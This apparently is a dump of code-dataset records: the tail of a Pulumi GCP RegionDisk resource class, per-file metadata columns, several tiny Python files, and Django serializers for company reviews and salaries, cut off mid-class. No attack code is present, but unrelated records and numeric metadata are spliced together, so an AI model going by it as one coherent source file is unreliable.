__props__.__dict__["name"] = name
__props__.__dict__["physical_block_size_bytes"] = physical_block_size_bytes
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
if replica_zones is None and not opts.urn:
raise TypeError("Missing required property 'replica_zones'")
__props__.__dict__["replica_zones"] = replica_zones
__props__.__dict__["size"] = size
__props__.__dict__["snapshot"] = snapshot
__props__.__dict__["source_snapshot_encryption_key"] = source_snapshot_encryption_key
__props__.__dict__["type"] = type
__props__.__dict__["creation_timestamp"] = None
__props__.__dict__["label_fingerprint"] = None
__props__.__dict__["last_attach_timestamp"] = None
__props__.__dict__["last_detach_timestamp"] = None
__props__.__dict__["self_link"] = None
__props__.__dict__["source_snapshot_id"] = None
__props__.__dict__["users"] = None
super(RegionDisk, __self__).__init__(
'gcp:compute/regionDisk:RegionDisk',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']]] = None,
interface: Optional[pulumi.Input[str]] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
last_attach_timestamp: Optional[pulumi.Input[str]] = None,
last_detach_timestamp: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
self_link: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']]] = None,
source_snapshot_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'RegionDisk':
"""
Get an existing RegionDisk resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
:param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
:param pulumi.Input[str] label_fingerprint: The fingerprint used for optimistic locking of this resource. Used internally during updates.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
:param pulumi.Input[str] last_attach_timestamp: Last attach timestamp in RFC3339 text format.
:param pulumi.Input[str] last_detach_timestamp: Last detach timestamp in RFC3339 text format.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: A reference to the region where the disk resides.
:param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
:param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
:param pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
:param pulumi.Input[str] source_snapshot_id: The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
:param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
:param pulumi.Input[Sequence[pulumi.Input[str]]] users: Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _RegionDiskState.__new__(_RegionDiskState)
__props__.__dict__["creation_timestamp"] = creation_timestamp
__props__.__dict__["description"] = description
__props__.__dict__["disk_encryption_key"] = disk_encryption_key
__props__.__dict__["interface"] = interface
__props__.__dict__["label_fingerprint"] = label_fingerprint
__props__.__dict__["labels"] = labels
__props__.__dict__["last_attach_timestamp"] = last_attach_timestamp
__props__.__dict__["last_detach_timestamp"] = last_detach_timestamp
__props__.__dict__["name"] = name
__props__.__dict__["physical_block_size_bytes"] = physical_block_size_bytes
__props__.__dict__["project"] = project
__props__.__dict__["region"] = region
__props__.__dict__["replica_zones"] = replica_zones
__props__.__dict__["self_link"] = self_link
__props__.__dict__["size"] = size
__props__.__dict__["snapshot"] = snapshot
__props__.__dict__["source_snapshot_encryption_key"] = source_snapshot_encryption_key
__props__.__dict__["source_snapshot_id"] = source_snapshot_id
__props__.__dict__["type"] = type
__props__.__dict__["users"] = users
return RegionDisk(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="diskEncryptionKey")
def disk_encryption_key(self) -> pulumi.Output[Optional['outputs.RegionDiskDiskEncryptionKey']]:
"""
Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
"""
return pulumi.get(self, "disk_encryption_key")
@property
@pulumi.getter
def interface(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
"""
return pulumi.get(self, "interface")
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> pulumi.Output[str]:
"""
The fingerprint used for optimistic locking of this resource. Used internally during updates.
"""
return pulumi.get(self, "label_fingerprint")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Labels to apply to this disk. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="lastAttachTimestamp")
def last_attach_timestamp(self) -> pulumi.Output[str]:
"""
Last attach timestamp in RFC3339 text format.
"""
return pulumi.get(self, "last_attach_timestamp")
@property
@pulumi.getter(name="lastDetachTimestamp")
def last_detach_timestamp(self) -> pulumi.Output[str]:
"""
Last detach timestamp in RFC3339 text format.
"""
return pulumi.get(self, "last_detach_timestamp")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="physicalBlockSizeBytes")
def physical_block_size_bytes(self) -> pulumi.Output[int]:
"""
Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
"""
return pulumi.get(self, "physical_block_size_bytes")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter
def region(self) -> pulumi.Output[str]:
"""
A reference to the region where the disk resides.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter(name="replicaZones")
def replica_zones(self) -> pulumi.Output[Sequence[str]]:
"""
URLs of the zones where the disk should be replicated to.
"""
return pulumi.get(self, "replica_zones")
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> pulumi.Output[str]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@property
@pulumi.getter
def size(self) -> pulumi.Output[int]:
"""
Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
"""
return pulumi.get(self, "size")
@property
@pulumi.getter
def snapshot(self) -> pulumi.Output[Optional[str]]:
"""
The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
"""
return pulumi.get(self, "snapshot")
@property
@pulumi.getter(name="sourceSnapshotEncryptionKey")
def source_snapshot_encryption_key(self) -> pulumi.Output[Optional['outputs.RegionDiskSourceSnapshotEncryptionKey']]:
"""
The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
"""
return pulumi.get(self, "source_snapshot_encryption_key")
@property
@pulumi.getter(name="sourceSnapshotId")
def source_snapshot_id(self) -> pulumi.Output[str]:
"""
The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
"""
return pulumi.get(self, "source_snapshot_id")
@property
@pulumi.getter
def type(self) -> pulumi.Output[Optional[str]]:
"""
URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter
def users(self) -> pulumi.Output[Sequence[str]]:
"""
Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
"""
return pulumi.get(self, "users")
| 50.240755
| 218
| 0.65885
| 8,242
| 66,569
| 5.194128
| 0.049381
| 0.063466
| 0.052651
| 0.044709
| 0.949054
| 0.934151
| 0.911773
| 0.903784
| 0.894721
| 0.883579
| 0
| 0.004359
| 0.259039
| 66,569
| 1,324
| 219
| 50.278701
| 0.863558
| 0.484385
| 0
| 0.771681
| 1
| 0.010619
| 0.149268
| 0.05635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.164602
| false
| 0.00177
| 0.012389
| 0
| 0.277876
| 0.026549
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0e97446dfdb4d3416e8d65b1ffa0d8fe648abc60
| 95
|
py
|
Python
|
tests/__init__.py
|
Martynas-P/bencode
|
d4b2a406e07aa828bfc02eb1ed3bd68efbe1c6cb
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Martynas-P/bencode
|
d4b2a406e07aa828bfc02eb1ed3bd68efbe1c6cb
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
Martynas-P/bencode
|
d4b2a406e07aa828bfc02eb1ed3bd68efbe1c6cb
|
[
"Apache-2.0"
] | null | null | null |
from tests.test_decode import DecodeBencodeTest
from tests.test_encode import EncodeBencodeTest
| 47.5
| 47
| 0.905263
| 12
| 95
| 7
| 0.666667
| 0.214286
| 0.309524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073684
| 95
| 2
| 48
| 47.5
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ea2e22360be1bffa8ed8d08e71c0d738defd665
| 540
|
py
|
Python
|
eval_medseg_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_medseg_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_medseg_timm-regnetx_002_GridDistortion.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_medseg_unetplusplus_timm-regnetx_002_0_GridDistortion.yml",
"python main.py --configs configs/eval_medseg_unetplusplus_timm-regnetx_002_1_GridDistortion.yml",
"python main.py --configs configs/eval_medseg_unetplusplus_timm-regnetx_002_2_GridDistortion.yml",
"python main.py --configs configs/eval_medseg_unetplusplus_timm-regnetx_002_3_GridDistortion.yml",
"python main.py --configs configs/eval_medseg_unetplusplus_timm-regnetx_002_4_GridDistortion.yml",
]
for l in ls:
os.system(l)
| 49.090909
| 102
| 0.846296
| 80
| 540
| 5.3375
| 0.3
| 0.117096
| 0.140515
| 0.222482
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0.885246
| 0
| 0.039293
| 0.057407
| 540
| 11
| 103
| 49.090909
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0.878004
| 0.64695
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
70dd040d24aabd8780e0510426ec2848cf88cefd
| 108
|
py
|
Python
|
app/views/viewApi.py
|
WalterSilva5/WS-BI
|
295e2d99abf39e231aa52b00c5c4c2765a62ce68
|
[
"MIT"
] | null | null | null |
app/views/viewApi.py
|
WalterSilva5/WS-BI
|
295e2d99abf39e231aa52b00c5c4c2765a62ce68
|
[
"MIT"
] | null | null | null |
app/views/viewApi.py
|
WalterSilva5/WS-BI
|
295e2d99abf39e231aa52b00c5c4c2765a62ce68
|
[
"MIT"
] | null | null | null |
from .viewsApi.api_vendas_do_dia_por_vendedor import *
from .viewsApi.api_vendas_do_dia_por_filial import *
| 36
| 54
| 0.87037
| 18
| 108
| 4.666667
| 0.555556
| 0.285714
| 0.357143
| 0.5
| 0.690476
| 0.690476
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 108
| 2
| 55
| 54
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
70e7f836b24bca12986f2be4197c4ce8b8c7ec8f
| 85
|
py
|
Python
|
accounts/helpers.py
|
mcm66103/ez-django
|
2e097facc4fac99b9bae450147319120ba908902
|
[
"MIT"
] | 1
|
2019-11-15T14:13:22.000Z
|
2019-11-15T14:13:22.000Z
|
accounts/helpers.py
|
mcm66103/ez-django
|
2e097facc4fac99b9bae450147319120ba908902
|
[
"MIT"
] | 11
|
2019-12-20T13:15:03.000Z
|
2022-03-12T00:04:36.000Z
|
accounts/helpers.py
|
mcm66103/ez-django
|
2e097facc4fac99b9bae450147319120ba908902
|
[
"MIT"
] | null | null | null |
import secrets
def generate_confirmation_number():
return secrets.token_hex(16)
| 21.25
| 36
| 0.8
| 11
| 85
| 5.909091
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.027027
| 0.129412
| 85
| 4
| 37
| 21.25
| 0.851351
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 7
|
cb1027de6390074d959f3cabd4bc9f1e23e66ff7
| 51,681
|
py
|
Python
|
review/serializers.py
|
yazdanv/backend
|
49da8d46e108bc2000fdabc1b991836f2cc50687
|
[
"MIT"
] | 2
|
2021-06-11T21:41:05.000Z
|
2021-06-16T03:58:16.000Z
|
review/serializers.py
|
salva-imm/backend
|
4201eccac5c040caac8330911ed0530385dd1b69
|
[
"MIT"
] | null | null | null |
review/serializers.py
|
salva-imm/backend
|
4201eccac5c040caac8330911ed0530385dd1b69
|
[
"MIT"
] | 1
|
2021-05-10T04:40:22.000Z
|
2021-05-10T04:40:22.000Z
|
import re
from datetime import date, datetime
from django.db import transaction
from django.db.models import Q
from django.conf import settings
from rest_framework import serializers
from bs4 import BeautifulSoup
from review.models import Pros, Cons, CompanyReview, Interview, ReviewComment, InterviewComment
from review.permissions import (check_create_company_review_permission, check_create_interview_permission,
check_create_review_comment_permission, check_create_interview_comment_permission)
from company.models import Company
from job.models import Job
from company.serializers import PublicUserCompanySerializer
from job.serializers import PublicUserJobSerializer
from review import utilities as review_utilities
from utilities import utilities
class ProsSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
name = serializers.CharField(max_length=100, min_length=2)
icon = serializers.CharField(max_length=50, required=False)
logo = serializers.CharField(max_length=200, required=False)
is_deleted = serializers.ReadOnlyField()
def validate_logo(self, logo):
utilities.check_file_exist(logo)
return logo
@transaction.atomic
def create(self, validated_data):
pros = Pros(**validated_data)
pros.save()
return pros
@transaction.atomic
def update(self, instance, validated_data):
instance.icon = validated_data.get('icon', instance.icon)
instance.save()
return instance
def to_internal_value(self, data):
data = super().to_internal_value(data)
return data
def to_representation(self, instance):
instance = super().to_representation(instance)
return instance
class UserProsSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
name = serializers.ReadOnlyField()
icon = serializers.ReadOnlyField()
logo = serializers.ReadOnlyField()
priority = serializers.ReadOnlyField()
class ConsSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
name = serializers.CharField(max_length=100, min_length=2)
icon = serializers.CharField(max_length=50, required=False)
logo = serializers.CharField(max_length=200, required=False)
is_deleted = serializers.ReadOnlyField()
def validate_logo(self, logo):
utilities.check_file_exist(logo)
return logo
@transaction.atomic
def create(self, validated_data):
cons = Cons(**validated_data)
cons.save()
return cons
@transaction.atomic
def update(self, instance, validated_data):
instance.icon = validated_data.get('icon', instance.icon)
instance.save()
return instance
def to_internal_value(self, data):
data = super().to_internal_value(data)
return data
def to_representation(self, instance):
instance = super().to_representation(instance)
return instance
class UserConsSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
name = serializers.ReadOnlyField()
icon = serializers.ReadOnlyField()
logo = serializers.ReadOnlyField()
priority = serializers.ReadOnlyField()
class CompanyReviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
recommend_to_friend = serializers.BooleanField()
pros = ProsSerializer(many=True, required=False)
cons = ConsSerializer(many=True, required=False)
state = serializers.ChoiceField(choices=settings.STATE_CHOICES)
# ratings
work_life_balance = serializers.ChoiceField(choices=settings.RATE_CHOICES)
salary_benefit = serializers.ChoiceField(choices=settings.RATE_CHOICES)
security = serializers.ChoiceField(choices=settings.RATE_CHOICES)
management = serializers.ChoiceField(choices=settings.RATE_CHOICES)
culture = serializers.ChoiceField(choices=settings.RATE_CHOICES)
title = serializers.CharField(max_length=100)
anonymous_job = serializers.BooleanField(default=False)
description = serializers.CharField(max_length=40000, required=False, allow_blank=True)
salary = serializers.IntegerField()
salary_type = serializers.ChoiceField(choices=CompanyReview.SALARY_CHOICES)
start_date = serializers.DateField(required=False)
end_date = serializers.DateField(required=False)
current_work = serializers.BooleanField(default=False)
is_deleted = serializers.ReadOnlyField()
has_legal_issue = serializers.ReadOnlyField()
creator_data = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
approved = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
reply = serializers.ReadOnlyField()
reply_created = serializers.ReadOnlyField()
total_review = serializers.ReadOnlyField()
rate_avg = serializers.ReadOnlyField()
def validate(self, data):
if data.get('salary'):
salary = review_utilities.salary_handler(data['salary'], data['salary_type'])
if salary > 50000000: # 50 million toman
raise serializers.ValidationError({'salary': ['Max Salary in month is 50 million toman :(.']})
if data.get('pros') and len(data['pros']) > 20:
raise serializers.ValidationError({'pros': ['Pros list must len 0, 20 item']})
if data.get('cons') and len(data['cons']) > 20:
raise serializers.ValidationError({'cons': ['Cons list must len 0, 20 item']})
if data.get('start_date') and date.today() < data['start_date']:
raise serializers.ValidationError({'start_date': ['Start date must be lower than today']})
if data.get('start_date') and data.get('end_date') and data['end_date'] < data['start_date']:
raise serializers.ValidationError({'end_date': ['End date must be greater than start date']})
return data
@transaction.atomic
def create(self, validated_data):
validated_data['company'] = Company.objects.get(company_slug=validated_data['company']['company_slug'])
validated_data['creator'] = self.context['request'].user
check_create_company_review_permission(validated_data['creator'], validated_data['company'])
if validated_data.get('pros') is not None:
pros_list = validated_data.pop('pros')
else:
pros_list = []
if validated_data.get('cons') is not None:
cons_list = validated_data.pop('cons')
else:
cons_list = []
if validated_data.get('description') is not None and not validated_data['description'].split(): # blank checking
validated_data.pop('description')
validated_data['job'] = Job.objects.get(job_slug=validated_data['job']['job_slug'])
validated_data['salary'] = review_utilities.salary_handler(validated_data['salary'], validated_data['salary_type'])
validated_data['over_all_rate'] = round((validated_data['work_life_balance'] + validated_data['salary_benefit']
+ validated_data['security'] + validated_data['management'] +
validated_data['culture']) / 5, 1)
validated_data['ip'] = utilities.get_client_ip(self.context['request'])
validated_data['approved'] = False
company_review = CompanyReview(**validated_data)
company_review.save()
for pros_data in pros_list:
pros = Pros.objects.get(name=pros_data['name'])
company_review.pros.add(pros)
pros.add_cons_priority()
for cons_data in cons_list:
cons = Cons.objects.get(name=cons_data['name'])
company_review.cons.add(cons)
cons.add_cons_priority()
validated_data['company'].handle_company_review_statics()
review_link = '{}/review/{}'.format(settings.WEB_BASE_PATH, company_review.pk)
utilities.telegram_notify('New review: on {}, \n by {} {}, \n link: {} {}'.format(company_review.company.name,
company_review.creator.first_name,
company_review.creator.last_name,
review_link,
'#review'),
company_review.id, 'review', company_review.title, company_review.description,
'{} {}'.format(company_review.creator.first_name, company_review.creator.last_name))
return company_review
@transaction.atomic
def update(self, instance, validated_data):
# permissions.check_update_permission(instance, validated_data)
instance.recommend_to_friend = validated_data.get('recommend_to_friend', instance.recommend_to_friend)
instance.state = validated_data.get('state', instance.state)
instance.work_life_balance = validated_data.get('work_life_balance', instance.work_life_balance)
instance.salary_benefit = validated_data.get('salary_benefit', instance.salary_benefit)
instance.security = validated_data.get('security', instance.security)
instance.management = validated_data.get('management', instance.management)
instance.culture = validated_data.get('culture', instance.culture)
instance.anonymous_job = validated_data.get('anonymous_job', instance.anonymous_job)
instance.start_date = validated_data.get('start_date', instance.start_date)
instance.end_date = validated_data.get('end_date', instance.end_date)
instance.current_work = validated_data.get('current_work', instance.current_work)
instance.over_all_rate = (instance.work_life_balance + instance.salary_benefit + instance.security +
instance.management + instance.culture) / 5
if (validated_data.get('salary', None) is not None and validated_data['salary'] != instance.salary) or\
(validated_data.get('salary_type') and validated_data['salary_type'] != instance.salary_type):
instance.salary = review_utilities.salary_handler(validated_data['salary'], validated_data['salary_type'])
instance.salary_type = validated_data.get('salary_type', instance.salary_type)
instance.title = validated_data.get('title', instance.title)
instance.description = validated_data.get('description', instance.description)
if validated_data.get('pros'):
instance.pros.clear()
for pros_data in validated_data['pros']:
pros = Pros.objects.get(name=pros_data['name'])
instance.pros.add(pros)
pros.add_cons_priority()
if validated_data.get('cons'):
instance.cons.clear()
for cons_data in validated_data['cons']:
cons = Cons.objects.get(name=cons_data['name'])
instance.cons.add(cons)
cons.add_cons_priority()
if validated_data.get('job') and instance.job.name != validated_data['job']['name']:
instance.job = Job.objects.get(job_slug=validated_data['job']['job_slug'])
instance.save()
instance.company.handle_company_review_statics()
review_link = '/review/{}'.format(settings.WEB_BASE_PATH, instance.pk)
utilities.telegram_notify('Review update: on {}, \n by {} {}, \n link: {} {}'.format(instance.company.name,
instance.creator.first_name,
instance.creator.last_name,
review_link,
'#update_review'),
instance.id, 'review', instance.title, instance.description,
'{} {}'.format(instance.creator.first_name, instance.creator.last_name))
return instance
def to_internal_value(self, data):
if data.get('pros'):
for pros_data in data['pros']:
pros = Pros.objects.filter(name=pros_data['name'].strip())
if not pros:
pros = Pros(name=pros_data['name'].strip())
pros.save()
if data.get('cons'):
for cons_data in data.get('cons'):
cons = Cons.objects.filter(name=cons_data['name'].strip())
if not cons:
cons = Cons(name=cons_data['name'].strip())
cons.save()
if data.get('job'):
job = Job.objects.filter(Q(name=data['job']['name'].strip()) |
Q(job_slug='-'.join(re.findall('[\w-]+', data['job']['name'].strip())).lower()))
if not job:
job = Job(name=data['job']['name'].strip(),
job_slug='-'.join(re.findall('[\w-]+', data['job']['name'].strip())).lower())
job.save()
else:
job = job[0]
data['job']['job_slug'] = job.job_slug
data = super().to_internal_value(data)
return data
def to_representation(self, instance):
instance.creator_data = {'name': instance.creator.username}
instance.salary = round(review_utilities.salary_handler(instance.salary,
instance.salary_type, resp=True)/100000)/10
self.fields['salary'] = serializers.FloatField()
instance.vote_count = instance.vote.count()
instance.down_vote_count = instance.vote.count()
instance.vote_state = utilities.check_vote_status(instance, self.context['request'].user)
instance.view_count = instance.view.count() + instance.total_view
instance.created = instance.created.strftime('%Y-%m-%d %H:%M')
instance.my_review = instance.creator == self.context['request'].user
instance.start_date = instance.start_date.strftime('%Y-%m') if instance.start_date else 'نامشخص'
instance.end_date = instance.end_date.strftime('%Y-%m') if instance.end_date else 'نامشخص'
instance.total_review = instance.creator.profile.total_review
instance.rate_avg = instance.creator.profile.rate_avg
instance = super().to_representation(instance)
return instance
class UserCompanyReviewSerializer(serializers.Serializer):
id = serializers.ReadOnlyField()
company = PublicUserCompanySerializer()
job = PublicUserJobSerializer()
recommend_to_friend = serializers.BooleanField()
pros = UserProsSerializer(many=True)
cons = UserConsSerializer(many=True)
state = serializers.ReadOnlyField()
# ratings
work_life_balance = serializers.ReadOnlyField()
salary_benefit = serializers.ReadOnlyField()
security = serializers.ReadOnlyField()
management = serializers.ReadOnlyField()
culture = serializers.ReadOnlyField()
title = serializers.ReadOnlyField()
description = serializers.ReadOnlyField()
salary = serializers.ReadOnlyField()
salary_type = serializers.ReadOnlyField()
vote_count = serializers.ReadOnlyField()
down_vote_count = serializers.ReadOnlyField()
vote_state = serializers.ReadOnlyField()
view_count = serializers.ReadOnlyField()
over_all_rate = serializers.ReadOnlyField()
created = serializers.ReadOnlyField()
my_review = serializers.ReadOnlyField()
start_date = serializers.ReadOnlyField()
end_date = serializers.ReadOnlyField()
current_work = serializers.ReadOnlyField()
anonymous_job = serializers.ReadOnlyField()
comment_count = serializers.ReadOnlyField()
